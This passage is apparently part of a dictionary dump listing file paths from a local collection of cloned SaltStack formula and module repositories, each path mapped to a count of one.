'/mnt/data/home/mdupont/experiments/salt-formulas/eHealthAfrica_demo-app/demo': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/eHealthAfrica_demo-app/demo/settings': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/eHealthAfrica_demo-app/demo_app': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/eHealthAfrica_demo-app/demo_app/models': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/eHealthAfrica_demo-app/demo_app/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/eHealthAfrica_demo-app/demo_app/views': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/eHealthAfrica_demo-app/manage': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/eHealthAfrica_salt_demo/saltstack/demo-app/manage': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/elbaschid_dockbot/dockbot': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/elbaschid_dockbot/dockbot/config_parser': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/elbaschid_dockbot/dockbot/database': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/elbaschid_dockbot/dockbot/scripts': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/elbaschid_dockbot/salt/base/salt/_modules/dockermod': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/elbaschid_dockbot/salt/base/salt/_states/docker': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/elbaschid_salt-states/_modules/myping': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/elvard_age-of-saltstack/docs/conf': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/esacteksab_learning-salt/django/base': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/esacteksab_salt-states/project1/base': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/esacteksab_salt-states/project2/base': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/felskrone_salt-eventsd/doc/share/doc/eventsd_workers/Minion_Return_Worker': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/felskrone_salt-eventsd/doc/share/doc/eventsd_workers/Minion_Sub_Worker': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/felskrone_salt-eventsd/doc/share/doc/eventsd_workers/New_Job_Worker': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/felskrone_salt-eventsd/salteventsd/backends': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/felskrone_salt-eventsd/salteventsd/daemon': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/felskrone_salt-eventsd/salteventsd/mysql': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/felskrone_salt-eventsd/salteventsd/timer': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/felskrone_salt-eventsd/salteventsd/version': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/felskrone_salt-eventsd/salteventsd/worker': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/fxdgear_salt-states/salt/_modules/sample': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/fxdgear_salt-states/salt/saltsrc/py_render': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/gladiatr72_pyOvirt/pyOvirt/bolts/config': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/gladiatr72_pyOvirt/pyOvirt/nuts/PollableQueue': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/gladiatr72_pyOvirt/pyOvirt/ovirt/storagedomains': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/grengojbo_python3-formula/python3/files/distribute_setup': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/gtmtechltd_salthiera/salt/pillar/salthiera': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/halfss_salt-dashboard/manage': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/halfss_salt-dashboard/salt_dashboard': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/halfss_salt-dashboard/salt_dashboard/api': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/halfss_salt-dashboard/salt_dashboard/api/common': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/halfss_salt-dashboard/salt_dashboard/settings': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/halfss_salt-dashboard/salt_dashboard/views': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/hipikat_salt-formulas/wsgi_still-formula/scripts/install_deps': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/holmboe_django-saltapi/django_saltapi': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/holmboe_django-saltapi/django_saltapi/forms': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/holmboe_django-saltapi/django_saltapi/models': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/holmboe_django-saltapi/django_saltapi/utils': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/hvnsweeting_nrpebase/nrpebase': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/hvnsweeting_saltstates/_states/dnsimple': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ionutbalutoiu_salt-openstack/file_root/_modules/glance': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ionutbalutoiu_salt-openstack/file_root/_modules/ini_manage': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ionutbalutoiu_salt-openstack/file_root/_modules/keystone': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ionutbalutoiu_salt-openstack/file_root/_modules/neutron': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ionutbalutoiu_salt-openstack/file_root/_states/glance': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ionutbalutoiu_salt-openstack/file_root/_states/ini_manage': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ionutbalutoiu_salt-openstack/file_root/_states/keystone': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ionutbalutoiu_salt-openstack/file_root/_states/neutron': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ist0ne_salt-states/salt/_grains/roles': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ist0ne_salt-states/salt/zabbix/files/usr/lib/python2.6/site-packages/zabbix': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ist0ne_salt-states/salt/zabbix/files/usr/lib/python2.6/site-packages/zabbix/zapi': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/jaddison_salt-base-states/salt': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/jaddison_salt-base-states/salt/_states/virtualenvwrapper': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/jasondenning_salt-pillar-dynamo/dynamo_pillar': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/jeffh_Seafood/bootstrap': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/jeffh_Seafood/bootstrap/config': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/jeffh_Seafood/bootstrap/hash_updater': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/jeffh_Seafood/bootstrap/utils': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/jeffh_Seafood/configurations/base/states/_modules/dmg': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/jeffh_Seafood/configurations/base/states/_modules/environment': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/jeffh_Seafood/configurations/base/states/_states/dmg': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/jeffh_Seafood/configurations/base/states/_states/environment': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/jeffh_Seafood/configurations/base/states/_states/iptables': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/jeffh_Seafood/configurations/base/states/_states/optional_file': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/jeffh_Seafood/configurations/base/states/_states/package': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/jesusaurus_salt-formula-rabbitmq/_modules/rabbitmq': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/jesusaurus_salt-formula-rabbitmq/_states/rabbitmq_cluster': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/jesusaurus_salt-formula-rabbitmq/_states/rabbitmq_plugin': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/jesusaurus_salt-formula-rabbitmq/_states/rabbitmq_policy': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/jesusaurus_salt-formula-rabbitmq/_states/rabbitmq_user': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/jesusaurus_salt-formula-rabbitmq/_states/rabbitmq_vhost': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/jlecount-sungevity_devsetup/setup': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/johnswanson_salt-modules/pwhash': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/jwineinger_salt-experiments/salt/graphite/local_settings': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/kadel_salt-tools/modules/openvz': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/kerncai_saltstack/salt_configuration/_grains/squid': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/khrisrichardson_salt-states/salt/_modules/cloudera': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/khrisrichardson_salt-states/salt/_modules/flannel': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/khrisrichardson_salt-states/salt/_modules/fleet': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/khrisrichardson_salt-states/salt/_modules/kubernetes': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/khrisrichardson_salt-states/salt/_modules/mesos': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/khrisrichardson_salt-states/salt/_modules/skydns': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/khrisrichardson_salt-states/salt/_states/cloudera_cluster': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/khrisrichardson_salt-states/salt/_states/cloudera_host': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/khrisrichardson_salt-states/salt/_states/cloudera_parcel': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/khrisrichardson_salt-states/salt/_states/cloudera_role': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/khrisrichardson_salt-states/salt/_states/cloudera_role_config_group': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/khrisrichardson_salt-states/salt/_states/cloudera_service': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/khrisrichardson_salt-states/salt/openstack-dashboard-ubuntu-theme/etc/openstack-dashboard/ubuntu_theme': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/kjoconnor_salt-contrib/_grains/ec2': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/kjoconnor_salt-contrib/_modules/aws_elb': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/kjoconnor_salt-contrib/_states/aws_elb': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/kstaken_salt-test-runner/salttest': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/kvmate_kvmate-formula/django/files/local_settings': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/lietu-org_salt-init/merge_top_sls': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/lincolnloop_salt-stats/salt/_modules/elasticsearch': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/lincolnloop_salt-stats/salt/_modules/memcached': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/lincolnloop_salt-stats/salt/_modules/nginx': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/lincolnloop_salt-stats/salt/_modules/ntp': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/lincolnloop_salt-stats/salt/_modules/parsed_network': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/lincolnloop_salt-stats/salt/_modules/redis': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/lincolnloop_salt-stats/salt/_modules/uwsgi': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/lincolnloop_salt-stats/salt/_returners/carbon_new_return': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/lincolnloop_salt-stats/salt/_returners/influxdb_return': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/lincolnloop_salt-stats/salt/_returners/librato_return': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/lincolnloop_salt-stats/salt/_returners/salmon_return': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/luwenju_saltstack_module/nginx_conf_create': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/lytics_saltfiles/graphite/local_settings': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/m87carlson_salt-states/states/vim/files/pyflakes/ftplugin/python/pyflakes/pyflakes': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/m87carlson_salt-states/states/vim/files/pyflakes/ftplugin/python/pyflakes/pyflakes/checker': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/m87carlson_salt-states/states/vim/files/pyflakes/ftplugin/python/pyflakes/pyflakes/messages': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/m87carlson_salt-states/states/vim/files/pyflakes/ftplugin/python/pyflakes/pyflakes/scripts': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/m87carlson_salt-states/states/vim/files/pyflakes/ftplugin/python/pyflakes/pyflakes/scripts/pyflakes': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/m87carlson_salt-states/states/vim/files/pyflakes/ftplugin/python/pyflakes/pyflakes/test': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/m87carlson_salt-states/states/vim/files/pyflakes/ftplugin/python/pyflakes/pyflakes/test/harness': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/m87carlson_salt-states/states/vim/files/pyflakes/ftplugin/python/pyflakes/pyflakes/test/test_script': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mafrosis_salt-formulae/_grains/vmware': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mafrosis_salt-formulae/closure-compiler/closure-compiler': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mafrosis_salt-formulae/salt-backports/mysql.2014-1-0.module': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mafrosis_salt-formulae/salt-backports/rabbitmq_user.2014-1-0.state': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mafrosis_salt-formulae/salt-backports/rabbitmq_user.2014-1-1.state': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/majerteam_samba_report_module/_modules/samba_users': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/makinacorpus_makina-states/_scripts/gentags_env': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/makinacorpus_makina-states/_scripts/reset-perms': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/makinacorpus_makina-states/files/projects/2/hooks/deploy_hook': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/makinacorpus_makina-states/files/usr/local/admin_scripts/nagios/check_burp_backup_age': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/makinacorpus_makina-states/files/usr/local/admin_scripts/nagios/check_burp_counters': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/makinacorpus_makina-states/files/usr/local/admin_scripts/nagios/check_inotify': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/makinacorpus_makina-states/files/usr/local/admin_scripts/nagios/check_mongodb': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/makinacorpus_makina-states/files/usr/local/admin_scripts/nagios/check_mysql_health_autoconnect': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/makinacorpus_makina-states/files/usr/local/admin_scripts/nagios/check_pop3_cleaner': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/makinacorpus_makina-states/files/usr/local/admin_scripts/nagios/check_rbl': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/makinacorpus_makina-states/files/usr/local/admin_scripts/nagios/check_sar_perf': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/makinacorpus_makina-states/mc_states/api': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/makinacorpus_makina-states/mc_states/grains': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/makinacorpus_makina-states/mc_states/modules': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/makinacorpus_makina-states/mc_states/modules/mc_state': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/makinacorpus_makina-states/mc_states/pillar/mc_pillar': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/makinacorpus_makina-states/mc_states/ping': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/makinacorpus_makina-states/mc_states/project': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/makinacorpus_makina-states/mc_states/renderers': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/makinacorpus_makina-states/mc_states/returners': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/makinacorpus_makina-states/mc_states/runners': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/makinacorpus_makina-states/mc_states/states': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/makinacorpus_makina-states/mc_states/states/bacula': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/makinacorpus_makina-states/mc_states/states/mc_apache': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/makinacorpus_makina-states/mc_states/states/mc_php': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/makinacorpus_makina-states/mc_states/states/mc_project': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/makinacorpus_makina-states/mc_states/states/mc_proxy': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/makinacorpus_makina-states/mc_states/states/mc_registry': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/makinacorpus_makina-states/mc_states/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/makinacorpus_makina-states/mc_states/tests/modules': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/makinacorpus_makina-states/mc_states/tests/modules/base': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/makinacorpus_makina-states/mc_states/utils': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/marselester_salt-stack-example/fabfile': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mathcamp_aws-formula/_modules/aws_util': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mathcamp_aws-formula/_modules/ec2': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mathcamp_aws-formula/_modules/elasticache': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mathcamp_aws-formula/_modules/elb': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mathcamp_aws-formula/_states/ec2': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mathcamp_aws-formula/_states/elasticache': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mathcamp_aws-formula/_states/elb': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/matthewpatterson_minions/modules/phpenv/_modules/phpenv': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/matthewpatterson_minions/modules/phpenv/_states/phpenv': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mattnorris_grain/src/gen_install_script': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mattnorris_grain/src/remove_color_palettes': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/maxmzkr_my-salt-states/_modules/PasswordGetter': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mickep76_pepa/pillar/pepa': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mike-perdide_custom_salt_states/custom_tools': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/minadyn_salty-anaconda/anaconda': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mingfang_docker-salt/srv/salt/_modules/dockercmd': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mingfang_docker-salt/srv/salt/_states/dockercmd': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ministryofjustice_elasticsearch-formula/elasticsearch/files/es2graphite': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ministryofjustice_salt-shaker/shaker': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ministryofjustice_salt-shaker/shaker/resolve_deps': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ministryofjustice_salt-shaker/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mjgorman_salinity/salinity/manage': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mjgorman_salinity/salinity/salinity': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mjgorman_salinity/salinity/salinity/settings': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mjgorman_salinity/salinity/salinity_front': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mjgorman_salinity/salinity/salinity_front/admin': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mjgorman_salinity/salinity/salinity_front/migrations': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mjgorman_salinity/salinity/salinity_front/models': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mjulian_misc-salt-states/files/nagiosStats': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/moccamaster_saltstack-cgminer/cgminer': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/monash-merc_cvl-salt-states/runners/sshkeys': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/morlandi_stack_basic/saltstack/salt/django-learn-postgresql/base': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mortis1337_salt-dash/config': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mortis1337_salt-dash/routes': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mosen_salt-osx/_grains/mac_battery': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mosen_salt-osx/_modules/ard': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mosen_salt-osx/_modules/desktop': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mosen_salt-osx/_modules/dscl': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mosen_salt-osx/_modules/finder': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mosen_salt-osx/_modules/installer': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mosen_salt-osx/_modules/launchd': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mosen_salt-osx/_modules/login': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mosen_salt-osx/_modules/plist_nsdefaults': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mosen_salt-osx/_modules/plist_serialization': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mosen_salt-osx/_modules/pmset': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mosen_salt-osx/_modules/spctl': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mosen_salt-osx/_states/ard': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mosen_salt-osx/_states/bluetooth': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mosen_salt-osx/_states/cups': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mosen_salt-osx/_states/gatekeeper': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mosen_salt-osx/_states/plist': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mosen_salt-osx/_states/power': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mosen_salt-osx/docs/conf': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/novapost_saltpad/saltpad': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/oba11_salt-collectd/salt/_modules/nm': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/oba11_salt-nfs/salt/_modules/nm': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ogrisel_cardice/cardice': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ogrisel_cardice/cardice/provision': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ogrisel_cardice/cardice/templates': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/olemartinorg_my-i3-state/i3/doti3/status': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/olemartinorg_my-i3-state/i3/doti3/status-available.d/cpu-governor': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/olemartinorg_my-i3-state/i3/doti3/status-available.d/cpu-temperature': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/olemartinorg_my-i3-state/i3/doti3/status-available.d/disk-space': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/olemartinorg_my-i3-state/i3/doti3/status-available.d/interface-ip': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/olemartinorg_my-i3-state/i3/doti3/status-available.d/system-load': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/olemartinorg_my-i3-state/i3/doti3/status-available.d/system-mem': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/olemartinorg_my-i3-state/i3/doti3/status-available.d/system-swap': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/olemartinorg_my-i3-state/i3/doti3/status-available.d/time-clock': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/olemartinorg_my-i3-state/i3/doti3/status-available.d/time-date': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/olemartinorg_my-i3-state/i3/doti3/tools/toggle_touchpad': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ozgurakan_python4saltstack/if-else': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ozgurakan_python4saltstack/loop-range': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ozgurakan_python4saltstack/loops-for': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ozgurakan_python4saltstack/loops-nested': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ozgurakan_python4saltstack/loops-while': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/pengyao_salt-broker/saltbroker/broker': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/pengyao_salt-broker/saltbroker/metadata': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/pengyao_salt-broker/saltbroker/utils': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/pengyao_salt-lvs/salt/_states/lvs_server': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/pengyao_salt-lvs/salt/_states/lvs_service': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/pengyao_salt-zabbix/salt/_grains/roles': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/pengyao_salt-zabbix/salt/zabbix/files/usr/lib/python2.6/site-packages/zabbix': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/pengyao_salt-zabbix/salt/zabbix/files/usr/lib/python2.6/site-packages/zabbix/zapi': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/pgexperts_saltstack-talk-examples/srvsalt/01-users-only/_modules/pkg_resource': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/pgexperts_saltstack-talk-examples/srvsalt/02-postgresql/_modules/pkg_resource': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/pgexperts_saltstack-talk-examples/srvsalt/03-postgresql-pillar/_modules/pkg_resource': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/pgexperts_saltstack-talk-examples/srvsalt/04-pgbouncer-mine/_modules/pkg_resource': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/quantonganh_salt-states/_modules/brew': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/quantonganh_salt-states/_modules/sysvinit': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/quantonganh_salt-states/_states/archive': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/qw1mb0_saltstack/_modules/foo': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rabits_salt-stack-modules/_modules/additional': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rackeric_salt-nummr/application/python_apps/wsgi_configuration_module': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_node-salt-events/test/eventlisten': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/manage': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/accounts': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/accounts/registration': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/accounts/registration/backends': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/accounts/registration/backends/default': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/accounts/registration/backends/simple': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/accounts/registration/management': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/accounts/registration/management/commands': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/accounts/registration/signals': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/rangertaha_salt-manager/salt-manager/webapp/apps/accounts/signals': 1,
